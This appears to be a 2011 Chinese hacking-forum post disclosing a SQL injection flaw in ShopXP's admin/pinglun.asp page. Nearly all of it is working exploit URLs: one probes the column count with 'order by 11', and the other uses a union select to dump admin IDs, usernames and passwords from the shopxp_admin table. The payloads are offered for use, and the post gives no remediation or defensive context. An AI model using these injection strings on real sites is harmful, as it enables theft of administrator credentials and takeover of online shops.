再生缘 发表于 2011-10-13 23:18:47

shopxp pinglun.asp 页面注入漏洞

shopxp pinglun.asp 页面注入漏洞

注入主语句exp
http://www.xxxxxxx.cn/admin/pinglun.asp?id=131%20order%20by%2011and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from shopxp_admin


http://127.0.0.1/admin%5Fshopxp/pinglun.asp?id=131%20and%201=2%20union%20select%201,2,adminid,4,5,password,7,8,9,admin,11%20from%20shopxp_admin

页: [1]
查看完整版本: shopxp pinglun.asp 页面注入漏洞